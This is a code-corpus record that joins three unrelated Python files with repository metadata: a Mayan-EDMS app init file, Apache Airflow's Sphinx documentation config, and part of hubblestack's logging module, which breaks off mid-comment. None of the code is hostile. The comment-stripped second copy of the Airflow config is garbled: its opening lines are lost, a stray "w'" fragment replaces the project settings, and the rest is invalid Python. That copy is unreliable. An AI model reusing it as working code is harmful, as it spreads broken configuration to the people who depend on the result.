Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 7
|
2020-06-06T00:01:04.000Z
|
2022-01-13T01:47:17.000Z
|
mayan/apps/dependencies/__init__.py
|
Syunkolee9891/Mayan-EDMS
|
3759a9503a264a180b74cc8518388f15ca66ac1a
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import unicode_literals
default_app_config = 'mayan.apps.dependencies.apps.DependenciesApp'
| 27.25
| 67
| 0.862385
|
from __future__ import unicode_literals
default_app_config = 'mayan.apps.dependencies.apps.DependenciesApp'
| true
| true
|
790c8cd6cde18e829123f7a660cbb5a6be0b5d99
| 16,078
|
py
|
Python
|
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
vlive1111/airflow
|
7825e8f59034645ab3247229be83a3aa90baece1
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
# Disable Flake8 because of all the sphinx imports
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Airflow documentation build configuration file, created by
# sphinx-quickstart on Thu Oct 9 20:50:01 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
"""Configuration of Airflow Docs"""
import os
import sys
from glob import glob
from typing import List
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme # pylint: disable=unused-import
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
# Hack to allow changing for piece of the code to behave differently while
# the docs are being built. The main objective was to alter the
# behavior of the utils.apply_default that was hiding function headers
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
# == Sphinx configuration ======================================================
# -- Project information -------------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
# General information about the project.
project = 'Airflow'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# -- General configuration -----------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'provider_init_hack',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
'redirects',
'providers_packages_ref',
# First, generate redoc
'sphinxcontrib.redoc',
# Second, update redoc script
"sphinx_script_update",
"sphinxcontrib.spelling",
]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns: List[str] = [
# We only link to selected subpackages.
'_api/airflow/index.rst',
# We have custom page - operators-and-hooks-ref.rst
'_api/airflow/providers/index.rst',
# Packages with subpackages
"_api/airflow/providers/microsoft/index.rst",
"_api/airflow/providers/apache/index.rst",
"_api/airflow/providers/cncf/index.rst",
# Templates or partials
'autoapi_templates',
'howto/operator/google/_partials',
'howto/operator/microsoft/_partials',
]
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def _get_rst_filepath_from_path(filepath: str):
if os.path.isdir(filepath):
result = filepath
elif os.path.isfile(filepath) and filepath.endswith('/__init__.py'):
result = filepath.rpartition("/")[0]
else:
result = filepath.rpartition(".")[0]
result += "/index.rst"
result = f"_api/{os.path.relpath(result, ROOT_DIR)}"
return result
# Exclude top-level packages
# do not exclude these top-level modules from the doc build:
_allowed_top_level = ("exceptions.py",)
for path in glob(f"{ROOT_DIR}/airflow/*"):
name = os.path.basename(path)
if os.path.isfile(path) and not path.endswith(_allowed_top_level):
exclude_patterns.append(f"_api/airflow/{name.rpartition('.')[0]}")
browsable_packages = ["operators", "hooks", "sensors", "providers", "executors", "models", "secrets"]
if os.path.isdir(path) and name not in browsable_packages:
exclude_patterns.append(f"_api/airflow/{name}")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
# -- Options for HTML output ---------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# given, this must be the name of an image file (path relative to the
# configuration directory) that is the favicon of the docs. Modern browsers
# use this as the icon for tabs, windows and bookmarks. It should be a
# Windows-style icon file (.ico), which is 16x16 or 32x32 pixels large.
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# A list of JavaScript filename. The entry must be a filename string or a
# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# If false, no index is generated.
html_use_index = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# A dictionary of values to pass into the template engine’s context for all pages.
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
# == Extensions configuration ==================================================
# -- Options for sphinxcontrib.jinjac ------------------------------------------
# See: https://github.com/tardyp/sphinx-jinja
# Jinja context
jinja_contexts = {'config_ctx': {"configs": default_config_yaml()}}
# -- Options for sphinx.ext.autodoc --------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
# This value contains a list of modules to be mocked up. This is useful when some external dependencies
# are not met at build time and break the building process.
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.kusto',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# The default options for autodoc directives. They are applied to all autodoc directives automatically.
autodoc_default_options = {'show-inheritance': True, 'members': True}
# -- Options for sphinx.ext.intersphinx ----------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
# This config value contains the locations and names of other projects that should
# be linked to in this documentation.
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'celery': ('https://docs.celeryproject.org/en/stable/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
'jinja2': ('https://jinja.palletsprojects.com/en/master/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
# google-api
'google-api-core': ('https://googleapis.dev/python/google-api-core/latest', None),
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datacatalog': ('https://googleapis.dev/python/datacatalog/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-monitoring': ('https://googleapis.dev/python/monitoring/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for sphinx.ext.viewcode -------------------------------------------
# See: https://www.sphinx-doc.org/es/master/usage/extensions/viewcode.html
# If this is True, viewcode extension will emit viewcode-follow-imported event to resolve the name of
# the module by other extensions. The default is True.
viewcode_follow_imported_members = True
# -- Options for sphinx-autoapi ------------------------------------------------
# See: https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/_internal*',
'*/airflow/**/providers/**/utils/*',
'*/node_modules/*',
'*/example_dags/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for ext.exampleinclude --------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Options for ext.redirects -------------------------------------------------
redirects_file = 'redirects.txt'
# -- Options for sphinxcontrib.redoc -------------------------------------------
# See: https://sphinxcontrib-redoc.readthedocs.io/en/stable/
OPENAPI_FILE = os.path.join(os.path.dirname(__file__), "..", "airflow", "api_connexion", "openapi", "v1.yaml")
redoc = [
{
'name': 'Airflow REST API',
'page': 'stable-rest-api-ref',
'spec': OPENAPI_FILE,
'opts': {
'hide-hostname': True,
'no-auto-auth': True,
},
},
]
# Options for script updater
redoc_script_url = "https://cdn.jsdelivr.net/npm/redoc@2.0.0-rc.30/bundles/redoc.standalone.js"
| 38.009456
| 138
| 0.678505
|
import os
import sys
from glob import glob
from typing import List
import airflow
from airflow.configuration import default_config_yaml
try:
import sphinx_airflow_theme
airflow_theme_is_available = True
except ImportError:
airflow_theme_is_available = False
os.environ['BUILDING_AIRFLOW_DOCS'] = 'TRUE'
w'
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
# version = '1.0.0'
version = airflow.__version__
# The full version, including alpha/beta/rc tags.
# release = '1.0.0'
release = airflow.__version__
# -- General configuration -----------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'provider_init_hack',
'sphinx.ext.autodoc',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.graphviz',
'sphinxarg.ext',
'sphinxcontrib.httpdomain',
'sphinxcontrib.jinja',
'sphinx.ext.intersphinx',
'autoapi.extension',
'exampleinclude',
'docroles',
'removemarktransform',
'sphinx_copybutton',
'redirects',
'providers_packages_ref',
# First, generate redoc
'sphinxcontrib.redoc',
# Second, update redoc script
"sphinx_script_update",
"sphinxcontrib.spelling",
]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.join(os.path.dirname(__file__), 'exts'))
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns: List[str] = [
# We only link to selected subpackages.
'_api/airflow/index.rst',
# We have custom page - operators-and-hooks-ref.rst
'_api/airflow/providers/index.rst',
# Packages with subpackages
"_api/airflow/providers/microsoft/index.rst",
"_api/airflow/providers/apache/index.rst",
"_api/airflow/providers/cncf/index.rst",
# Templates or partials
'autoapi_templates',
'howto/operator/google/_partials',
'howto/operator/microsoft/_partials',
]
ROOT_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def _get_rst_filepath_from_path(filepath: str):
if os.path.isdir(filepath):
result = filepath
elif os.path.isfile(filepath) and filepath.endswith('/__init__.py'):
result = filepath.rpartition("/")[0]
else:
result = filepath.rpartition(".")[0]
result += "/index.rst"
result = f"_api/{os.path.relpath(result, ROOT_DIR)}"
return result
# Exclude top-level packages
# do not exclude these top-level modules from the doc build:
_allowed_top_level = ("exceptions.py",)
for path in glob(f"{ROOT_DIR}/airflow/*"):
name = os.path.basename(path)
if os.path.isfile(path) and not path.endswith(_allowed_top_level):
exclude_patterns.append(f"_api/airflow/{name.rpartition('.')[0]}")
browsable_packages = ["operators", "hooks", "sensors", "providers", "executors", "models", "secrets"]
if os.path.isdir(path) and name not in browsable_packages:
exclude_patterns.append(f"_api/airflow/{name}")
# Add any paths that contain templates here, relative to this directory.
templates_path = ['templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, keep warnings as "system message" paragraphs in the built documents.
keep_warnings = True
# -- Options for HTML output ---------------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
if airflow_theme_is_available:
html_theme = 'sphinx_airflow_theme'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Airflow Documentation"
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = ""
# given, this must be the name of an image file (path relative to the
# configuration directory) that is the favicon of the docs. Modern browsers
# use this as the icon for tabs, windows and bookmarks. It should be a
# Windows-style icon file (.ico), which is 16x16 or 32x32 pixels large.
html_favicon = "../airflow/www/static/pin_32.png"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# A list of JavaScript filename. The entry must be a filename string or a
# tuple containing the filename string and the attributes dictionary. The
# filename must be relative to the html_static_path, or a full URI with
# scheme like http://example.org/script.js.
html_js_files = ['jira-links.js']
# Custom sidebar templates, maps document names to template names.
if airflow_theme_is_available:
html_sidebars = {
'**': [
'version-selector.html',
'searchbox.html',
'globaltoc.html',
]
}
# If false, no index is generated.
html_use_index = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = False
# A dictionary of values to pass into the template engine’s context for all pages.
html_context = {
# Google Analytics ID.
# For more information look at:
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/layout.html#L222-L232
'theme_analytics_id': 'UA-140539454-1',
}
if airflow_theme_is_available:
html_context = {
# Variables used to build a button for editing the source code
#
# The path is created according to the following template:
#
# https://{{ github_host|default("github.com") }}/{{ github_user }}/{{ github_repo }}/
# {{ theme_vcs_pageview_mode|default("blob") }}/{{ github_version }}{{ conf_py_path }}
# {{ pagename }}{{ suffix }}
#
# More information:
# https://github.com/readthedocs/readthedocs.org/blob/master/readthedocs/doc_builder/templates/doc_builder/conf.py.tmpl#L100-L103
# https://github.com/readthedocs/sphinx_rtd_theme/blob/master/sphinx_rtd_theme/breadcrumbs.html#L45
# https://github.com/apache/airflow-site/blob/91f760c/sphinx_airflow_theme/sphinx_airflow_theme/suggest_change_button.html#L36-L40
#
'theme_vcs_pageview_mode': 'edit',
'conf_py_path': '/docs/',
'github_user': 'apache',
'github_repo': 'airflow',
'github_version': 'master',
'display_github': 'master',
'suffix': '.rst',
}
# == Extensions configuration ==================================================
# -- Options for sphinxcontrib.jinjac ------------------------------------------
# See: https://github.com/tardyp/sphinx-jinja
# Jinja context
jinja_contexts = {'config_ctx': {"configs": default_config_yaml()}}
# -- Options for sphinx.ext.autodoc --------------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
# This value contains a list of modules to be mocked up. This is useful when some external dependencies
# are not met at build time and break the building process.
autodoc_mock_imports = [
'MySQLdb',
'adal',
'analytics',
'azure',
'azure.cosmos',
'azure.datalake',
'azure.kusto',
'azure.mgmt',
'boto3',
'botocore',
'bson',
'cassandra',
'celery',
'cloudant',
'cryptography',
'cx_Oracle',
'datadog',
'distributed',
'docker',
'google',
'google_auth_httplib2',
'googleapiclient',
'grpc',
'hdfs',
'httplib2',
'jaydebeapi',
'jenkins',
'jira',
'kubernetes',
'msrestazure',
'pandas',
'pandas_gbq',
'paramiko',
'pinotdb',
'psycopg2',
'pydruid',
'pyhive',
'pyhive',
'pymongo',
'pymssql',
'pysftp',
'qds_sdk',
'redis',
'simple_salesforce',
'slackclient',
'smbclient',
'snowflake',
'sshtunnel',
'tenacity',
'vertica_python',
'winrm',
'zdesk',
]
# The default options for autodoc directives. They are applied to all autodoc directives automatically.
autodoc_default_options = {'show-inheritance': True, 'members': True}
# -- Options for sphinx.ext.intersphinx ----------------------------------------
# See: https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
# This config value contains the locations and names of other projects that should
# be linked to in this documentation.
intersphinx_mapping = {
'boto3': ('https://boto3.amazonaws.com/v1/documentation/api/latest/', None),
'celery': ('https://docs.celeryproject.org/en/stable/', None),
'hdfs': ('https://hdfscli.readthedocs.io/en/latest/', None),
'jinja2': ('https://jinja.palletsprojects.com/en/master/', None),
'mongodb': ('https://api.mongodb.com/python/current/', None),
'pandas': ('https://pandas.pydata.org/pandas-docs/stable/', None),
'python': ('https://docs.python.org/3/', None),
'requests': ('https://requests.readthedocs.io/en/master/', None),
'sqlalchemy': ('https://docs.sqlalchemy.org/en/latest/', None),
# google-api
'google-api-core': ('https://googleapis.dev/python/google-api-core/latest', None),
'google-cloud-automl': ('https://googleapis.dev/python/automl/latest', None),
'google-cloud-bigquery': ('https://googleapis.dev/python/bigquery/latest', None),
'google-cloud-bigquery-datatransfer': ('https://googleapis.dev/python/bigquerydatatransfer/latest', None),
'google-cloud-bigquery-storage': ('https://googleapis.dev/python/bigquerystorage/latest', None),
'google-cloud-bigtable': ('https://googleapis.dev/python/bigtable/latest', None),
'google-cloud-container': ('https://googleapis.dev/python/container/latest', None),
'google-cloud-core': ('https://googleapis.dev/python/google-cloud-core/latest', None),
'google-cloud-datacatalog': ('https://googleapis.dev/python/datacatalog/latest', None),
'google-cloud-datastore': ('https://googleapis.dev/python/datastore/latest', None),
'google-cloud-dlp': ('https://googleapis.dev/python/dlp/latest', None),
'google-cloud-kms': ('https://googleapis.dev/python/cloudkms/latest', None),
'google-cloud-language': ('https://googleapis.dev/python/language/latest', None),
'google-cloud-monitoring': ('https://googleapis.dev/python/monitoring/latest', None),
'google-cloud-pubsub': ('https://googleapis.dev/python/pubsub/latest', None),
'google-cloud-redis': ('https://googleapis.dev/python/redis/latest', None),
'google-cloud-spanner': ('https://googleapis.dev/python/spanner/latest', None),
'google-cloud-speech': ('https://googleapis.dev/python/speech/latest', None),
'google-cloud-storage': ('https://googleapis.dev/python/storage/latest', None),
'google-cloud-tasks': ('https://googleapis.dev/python/cloudtasks/latest', None),
'google-cloud-texttospeech': ('https://googleapis.dev/python/texttospeech/latest', None),
'google-cloud-translate': ('https://googleapis.dev/python/translation/latest', None),
'google-cloud-videointelligence': ('https://googleapis.dev/python/videointelligence/latest', None),
'google-cloud-vision': ('https://googleapis.dev/python/vision/latest', None),
}
# -- Options for sphinx.ext.viewcode -------------------------------------------
# See: https://www.sphinx-doc.org/es/master/usage/extensions/viewcode.html
# If this is True, viewcode extension will emit viewcode-follow-imported event to resolve the name of
# the module by other extensions. The default is True.
viewcode_follow_imported_members = True
# -- Options for sphinx-autoapi ------------------------------------------------
# See: https://sphinx-autoapi.readthedocs.io/en/latest/config.html
# Paths (relative or absolute) to the source code that you wish to generate
# your API documentation from.
autoapi_dirs = [
os.path.abspath('../airflow'),
]
# A directory that has user-defined templates to override our default templates.
autoapi_template_dir = 'autoapi_templates'
# A list of patterns to ignore when finding files
autoapi_ignore = [
'*/airflow/kubernetes/kubernetes_request_factory/*',
'*/_internal*',
'*/airflow/**/providers/**/utils/*',
'*/node_modules/*',
'*/example_dags/*',
'*/migrations/*',
]
# Keep the AutoAPI generated files on the filesystem after the run.
# Useful for debugging.
autoapi_keep_files = True
# Relative path to output the AutoAPI files into. This can also be used to place the generated documentation
# anywhere in your documentation hierarchy.
autoapi_root = '_api'
# -- Options for ext.exampleinclude --------------------------------------------
exampleinclude_sourceroot = os.path.abspath('..')
# -- Options for ext.redirects -------------------------------------------------
redirects_file = 'redirects.txt'
# -- Options for sphinxcontrib.redoc -------------------------------------------
# See: https://sphinxcontrib-redoc.readthedocs.io/en/stable/
OPENAPI_FILE = os.path.join(os.path.dirname(__file__), "..", "airflow", "api_connexion", "openapi", "v1.yaml")
redoc = [
{
'name': 'Airflow REST API',
'page': 'stable-rest-api-ref',
'spec': OPENAPI_FILE,
'opts': {
'hide-hostname': True,
'no-auto-auth': True,
},
},
]
# Options for script updater
redoc_script_url = "https://cdn.jsdelivr.net/npm/redoc@2.0.0-rc.30/bundles/redoc.standalone.js"
| true
| true
|
790c8dc814e7074f4e401866caea91228581eec8
| 6,628
|
py
|
Python
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | 2
|
2019-11-30T19:36:25.000Z
|
2020-09-23T06:28:26.000Z
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | 3
|
2020-08-03T18:14:02.000Z
|
2020-08-03T22:43:44.000Z
|
hubblestack/log.py
|
instructure/hubble
|
d94ec81f478e3a59611faa0c125fd120e9f43d0b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Logging for the hubble daemon
"""
import logging
import time
import hubblestack.splunklogging
# These patterns will not be logged by "conf_publisher" and "emit_to_splunk"
PATTERNS_TO_FILTER = ["password", "token", "passphrase", "privkey",
"keyid", "s3.key", "splunk_token"]
# While hubble doesn't use these, salt modules can, so let's define them anyway
SPLUNK = logging.SPLUNK = 25
PROFILE = logging.PROFILE = 15
TRACE = logging.TRACE = 5
GARBAGE = logging.GARBAGE = 1
QUIET = logging.QUIET = 1000
LOG_LEVELS = {
'all': logging.NOTSET,
'debug': logging.DEBUG,
'error': logging.ERROR,
'critical': logging.CRITICAL,
'garbage': GARBAGE,
'info': logging.INFO,
'profile': PROFILE,
'quiet': QUIET,
'trace': TRACE,
'warning': logging.WARNING,
}
logging.addLevelName(SPLUNK, 'SPLUNK')
logging.addLevelName(QUIET, 'QUIET')
logging.addLevelName(PROFILE, 'PROFILE')
logging.addLevelName(TRACE, 'TRACE')
logging.addLevelName(GARBAGE, 'GARBAGE')
def _splunk(self, message, *args, **kwargs):
if self.isEnabledFor(logging.SPLUNK):
self._log(logging.SPLUNK, message, args, **kwargs)
def _quiet(self, message, *args, **kwargs):
if self.isEnabledFor(logging.QUIET):
self._log(logging.QUIET, message, args, **kwargs)
def _profile(self, message, *args, **kwargs):
if self.isEnabledFor(logging.PROFILE):
self._log(logging.PROFILE, message, args, **kwargs)
def _trace(self, message, *args, **kwargs):
if self.isEnabledFor(logging.TRACE):
self._log(logging.TRACE, message, args, **kwargs)
def _garbage(self, message, *args, **kwargs):
if self.isEnabledFor(logging.GARBAGE):
self._log(logging.GARBAGE, message, args, **kwargs)
logging.Logger.splunk = _splunk
logging.Logger.quiet = _quiet
logging.Logger.profile = _profile
logging.Logger.trace = _trace
logging.Logger.garbage = _garbage
SPLUNK_HANDLER = None
class MockRecord(object):
""" Fake record that mimicks a logging record """
def __init__(self, message, levelname, asctime, name):
self.message = message
self.levelname = levelname
self.asctime = asctime
self.name = name
# Set up an early log handler for use while we're generating config.
# Will be removed when we set up the console or file logger.
TEMP_HANDLER = logging.StreamHandler()
TEMP_HANDLER.setLevel(logging.INFO)
TEMP_HANDLER.setFormatter(logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s'))
logging.root.handlers.insert(0, TEMP_HANDLER)
def _remove_temp_handler():
"""
Remove temporary handler if it exists
"""
if TEMP_HANDLER and TEMP_HANDLER in logging.root.handlers:
logging.root.handlers.remove(TEMP_HANDLER)
def setup_console_logger(log_level='error',
log_format='%(asctime)s [%(levelname)-5s] %(message)s',
date_format='%H:%M:%S'):
"""
Sets up logging to STDERR, allowing for configurable level, format, and
date format.
"""
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.StreamHandler()
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_file_logger(log_file,
log_level='error',
log_format='%(asctime)s,%(msecs)03d [%(levelname)-5s] [%(name)s:%(lineno)d] '
' %(message)s',
date_format='%Y-%m-%d %H:%M:%S',
max_bytes=100000000,
backup_count=1):
"""
Sets up logging to a file. By default will auto-rotate those logs every
100MB and keep one backup.
"""
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = logging.handlers.RotatingFileHandler(log_file, maxBytes=max_bytes,
backupCount=backup_count)
handler.setLevel(LOG_LEVELS.get(log_level, logging.ERROR))
formatter = logging.Formatter(log_format, date_format)
handler.setFormatter(formatter)
rootlogger.addHandler(handler)
def setup_splunk_logger():
"""
Sets up logging to splunk.
"""
_remove_temp_handler()
rootlogger = logging.getLogger()
handler = hubblestack.splunklogging.SplunkHandler()
handler.setLevel(logging.SPLUNK)
rootlogger.addHandler(handler)
global SPLUNK_HANDLER
SPLUNK_HANDLER = handler
def emit_to_splunk(message, level, name):
"""
Emit a single message to splunk
"""
if isinstance(message, (list, dict)):
message = filter_logs(message, remove_dots=False)
if SPLUNK_HANDLER is None:
return False
handler = SPLUNK_HANDLER
handler.emit(MockRecord(message, level, time.asctime(), name))
return True
def workaround_salt_log_handler_queues():
"""
Build a fake log handler and add it to LOGGING_STORE_HANDLER and LOGGING_NULL_HANDLER
"""
class _FakeLogHandler(object):
level = 10
count = 0
def handle(self, _record):
""" Receive a record and increase the count """
self.count += 1
flh = _FakeLogHandler()
import salt.log.setup as sls
sls.LOGGING_STORE_HANDLER.sync_with_handlers([flh])
sls.LOGGING_NULL_HANDLER.sync_with_handlers([flh])
# if flh.count > 0:
# log.info("pretended to handle %d logging record(s)
